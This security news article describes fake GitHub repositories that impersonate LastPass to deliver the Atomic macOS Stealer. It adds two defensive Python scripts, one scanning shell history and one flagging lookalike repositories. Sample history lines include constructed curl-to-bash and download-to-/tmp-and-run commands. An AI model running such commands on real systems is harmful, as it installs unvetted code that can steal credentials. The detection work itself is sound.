
Fake GitHub Repositories Target macOS Users with Infostealer Malware

Cybersecurity researchers have uncovered a widespread campaign in which threat actors are impersonating well-known brands to infect macOS users with information-stealing malware.


Cybersecurity researchers have uncovered a widespread campaign in which threat actors are impersonating well-known brands to infect macOS users with information-stealing malware. The campaign, flagged by LastPass, highlights how attackers are abusing trusted platforms like GitHub and search engines to distribute malicious software.

Attack Methodology

The attack begins with fraudulent GitHub repositories that appear in search results due to search engine optimization (SEO) techniques. These repositories claim to provide legitimate macOS applications from trusted companies.

In reality, the links redirect users to malicious websites. In LastPass’s case, two fraudulent repositories impersonated the company, with names such as “LastPass on MacBook” and “LastPass Premium on MacBook.” These were created by a user under the alias modhopmduck476 on September 16, 2025.

Instead of downloading a legitimate program, victims were redirected to macprograms-pro[.]com, where they were instructed to paste a command into their terminal. This command issued a curl request that downloaded a malicious payload into the system's temporary directory.
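The paste-into-terminal step described above leaves a recognisable trace: a curl or wget fetch, a drop into a temporary directory, and execution of whatever was fetched, all on one command line. The following is an added example (not code from the article or from LastPass) that scores a single command line for those three traits and scans shell history for lines worth a closer look. The history lines at the bottom are constructed samples using a made-up domain, not real indicators from the campaign.

```python
"""Rate pasted terminal one-liners for the fetch-then-run pattern above.

Added example, not code from the article or from LastPass. It scores a
single command line for three indicators the article describes: a
curl/wget download, a drop into a temporary directory, and execution of
what was fetched. Meant to run over shell history or process-command-line
telemetry. The history lines at the bottom are constructed samples with a
made-up domain, not real indicators.
"""
import re
import shlex

FETCH_TOOLS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript", "open"}
WRAPPERS = {"sudo", "nohup", "env", "command"}          # skipped to reach the real program
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "$TMPDIR", "${TMPDIR}", "/var/folders/")
EXECUTION = {"pipes_download_to_interpreter", "runs_temp_file", "chmod_temp_file"}


def _basename(token: str) -> str:
    return token.rsplit("/", 1)[-1]


def _is_temp(token: str) -> bool:
    return token.startswith(TEMP_PREFIXES)


def _stages(cmd: str):
    """Split a one-liner on |, ||, &&, ; into (preceding operator, argv) pairs."""
    pieces = re.split(r"\s*(\|\||&&|\||;)\s*", cmd.strip())
    stages, sep = [], ""
    for i, piece in enumerate(pieces):
        if i % 2 == 1:                 # odd positions hold the captured operator
            sep = piece
            continue
        try:
            argv = shlex.split(piece)
        except ValueError:             # unbalanced quotes: fall back to whitespace split
            argv = piece.split()
        while argv and _basename(argv[0]) in WRAPPERS:
            argv = argv[1:]
        if argv:
            stages.append((sep, argv))
    return stages


def indicators(cmd: str) -> set:
    """Names of the suspicious traits present in one command line."""
    found, prev_fetch = set(), False
    for sep, argv in _stages(cmd):
        prog = _basename(argv[0])
        temp_args = [a for a in argv if _is_temp(a)]
        if prog in FETCH_TOOLS:
            found.add("remote_fetch")
            if temp_args:
                found.add("drops_to_temp")
        elif prog in INTERPRETERS:
            if sep == "|" and prev_fetch:
                found.add("pipes_download_to_interpreter")
            if temp_args:
                found.add("runs_temp_file")
        elif prog == "chmod" and temp_args:
            found.add("chmod_temp_file")   # typically +x right before running it
        elif _is_temp(argv[0]):
            found.add("runs_temp_file")    # direct invocation such as /tmp/setup.sh
        prev_fetch = prog in FETCH_TOOLS
    return found


def risk(cmd: str) -> str:
    found = indicators(cmd)
    if "remote_fetch" in found and found & EXECUTION:
        return "high"                      # download and run in one paste
    if "remote_fetch" in found and "drops_to_temp" in found:
        return "medium"
    if found & EXECUTION:
        return "medium"
    return "low"                           # a plain download on its own is routine


def scan_history(lines) -> list:
    """(risk, command) for every history line rated above 'low'."""
    hits = []
    for line in lines:
        cmd = re.sub(r"^: \d+:\d+;", "", line).strip()   # strip zsh extended-history prefix
        if cmd and not cmd.startswith("#"):
            r = risk(cmd)
            if r != "low":
                hits.append((r, cmd))
    return hits


SAMPLE_HISTORY = [   # constructed lines in zsh extended-history format
    ": 1758000000:0;brew install --cask firefox",
    ": 1758000100:0;curl -fsSL https://installer.example.test/setup.sh -o /tmp/setup.sh"
    " && chmod +x /tmp/setup.sh && /tmp/setup.sh",
    ": 1758000200:0;curl -s https://installer.example.test/run | bash",
    ": 1758000300:0;curl -O https://example.test/readme.txt",
    ": 1758000400:0;git clone https://github.com/example/repo.git",
]

if __name__ == "__main__":
    for r, cmd in scan_history(SAMPLE_HISTORY):
        print(f"[{r}] {cmd}")
```

A plain download by itself is rated low on purpose, since curl is part of everyday developer work; the signal is the combination of a fetch with execution of the fetched content, which is exactly what a "paste this into your terminal" lure asks for. Feeding the same function an EDR's process-command-line field instead of `~/.zsh_history` works the same way.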

The Malware: Atomic macOS Stealer (AMOS)

The payload turned out to be Atomic macOS Stealer (AMOS), a well-known information-stealing malware that has been active since 2023. AMOS specializes in stealing:

  • Passwords and credentials

  • Browser autofill data

  • Cryptocurrency wallet information

  • Payment details

In August 2025, CrowdStrike warned about a new variant called SHAMOS, which further increased the malware’s reach through fraudulent ads.

Broader Targeting Strategy

LastPass noted that attackers are not just targeting its brand. They have been impersonating a wide range of organizations, including:

  • Financial institutions

  • Password managers

  • Technology companies

  • AI tools

  • Cryptocurrency wallets

By using multiple GitHub accounts with similar naming patterns, the attackers increase their chances of luring unsuspecting victims.

Historical Context

This campaign appears to be part of a broader strategy that has been ongoing since at least July 2025. Earlier, Deriv security researcher Dhiraj Mishra observed that Homebrew users were targeted through malicious ads leading to fake GitHub repositories.

These attacks exploit users’ trust in Google Ads and GitHub, often bundling the legitimate software installer with a hidden malicious payload that runs silently in the background.

Key Takeaways

  • macOS users are being actively targeted, despite perceptions that the platform is more secure.

  • Trusted platforms like GitHub and Google Ads can be abused, making vigilance essential.

  • AMOS remains a serious threat, capable of stealing financial and personal data with minimal user interaction.

Defensive Measures

Users are encouraged to:

  • Only download software from official vendor websites.

  • Avoid running commands copied from unverified sources.

  • Monitor GitHub repositories for authenticity.

  • Keep macOS security patches and antivirus solutions up to date.
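"Monitor GitHub repositories for authenticity" and the earlier point about multiple accounts reusing similar naming patterns can both be turned into a simple triage step. The following is an added example (not code from the article or from LastPass): it checks a github.com URL against an allowlist of GitHub owners the vendor actually controls, flags repositories that carry a brand name under some other owner, and groups suspicious repositories by their naming template so lures built on the same pattern cluster together. The allowlist is a placeholder assumption for the example (in practice take it from the vendor's own website), and the repository slugs are constructed from the repository titles and owner alias reported above; only those titles and the alias come from the article.

```python
"""Triage GitHub repository URLs that claim to offer a vendor's macOS app.

Added example, not code from the article or from LastPass. OFFICIAL_OWNERS
is an ASSUMED placeholder allowlist; take the real owners from the vendor's
own website. The URLs in SAMPLE_URLS are constructed for illustration: the
owner alias and the two LastPass repository titles are those reported in the
article, but the slugs and all other owners are made up.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

OFFICIAL_OWNERS = {            # brand -> GitHub owners the vendor controls (ASSUMED)
    "lastpass": {"lastpass"},
}
# Words that dress up a lure as a download page rather than a code project.
LURE_WORDS = {"macbook", "macos", "mac", "premium", "pro", "free",
              "download", "installer", "crack", "cracked"}


def parse_repo(url: str) -> tuple:
    """Return (owner, repo) from a github.com URL, lower-cased."""
    u = urlsplit(url)
    if u.netloc.lower().removeprefix("www.") != "github.com":
        raise ValueError(f"not a github.com URL: {url}")
    segs = [s for s in u.path.split("/") if s]
    if len(segs) < 2:
        raise ValueError(f"no owner/repo in URL: {url}")
    return segs[0].lower(), segs[1].lower().removesuffix(".git")


def _squash(s: str) -> str:
    return re.sub(r"[^a-z0-9]", "", s.lower())


def _words(s: str) -> set:
    return {w for w in re.split(r"[^a-z0-9]+", s.lower()) if w}


def assess_repo(url: str) -> dict:
    """Verdict 'official', 'impersonation_suspected' or 'unrelated' with reasons."""
    owner, repo = parse_repo(url)
    result = {"owner": owner, "repo": repo, "brand": None,
              "verdict": "unrelated", "reasons": []}
    for brand, owners in OFFICIAL_OWNERS.items():
        if owner in owners:
            result.update(brand=brand, verdict="official")
            return result
        in_repo, in_owner = brand in _squash(repo), brand in _squash(owner)
        if in_repo or in_owner:
            result.update(brand=brand, verdict="impersonation_suspected")
            if in_repo:
                result["reasons"].append("brand name in repo title but owner is not the vendor")
            if in_owner:
                result["reasons"].append("lookalike owner name")
            lures = sorted(_words(repo) & LURE_WORDS)
            if lures:
                result["reasons"].append("lure words: " + ", ".join(lures))
            return result
    return result


def lure_template(url: str) -> str:
    """Normalise a repo title so '<brand> on macbook' lures from different
    accounts collapse onto one template."""
    _, repo = parse_repo(url)
    words = [w for w in re.split(r"[^a-z0-9]+", repo.lower()) if w]
    return " ".join("<brand>" if any(b in w for b in OFFICIAL_OWNERS) else w
                    for w in words)


def cluster_lures(urls) -> dict:
    """Template -> list of owners, for every URL judged an impersonation."""
    groups = defaultdict(list)
    for u in urls:
        if assess_repo(u)["verdict"] == "impersonation_suspected":
            groups[lure_template(u)].append(parse_repo(u)[0])
    return dict(groups)


SAMPLE_URLS = [   # constructed; see module docstring
    "https://github.com/lastpass/some-tool",
    "https://github.com/modhopmduck476/LastPass-on-MacBook",
    "https://github.com/modhopmduck476/LastPass-Premium-on-MacBook",
    "https://github.com/another-account/LastPass-on-MacBook",
    "https://github.com/lastpass-official/installer",
    "https://github.com/someone/weather-app",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = assess_repo(u)
        print(f"{r['verdict']:24} {r['owner']}/{r['repo']}  {'; '.join(r['reasons'])}")
    print(cluster_lures(SAMPLE_URLS))
```

The check is deliberately naive about the repository contents: the point of the campaign is that the README and release link can look perfectly plausible, so the only reliable question is whether the owner is one the vendor publishes under. Clustering by template is what surfaces the "multiple accounts, same naming pattern" behaviour the article describes, which a per-repository check on its own would miss.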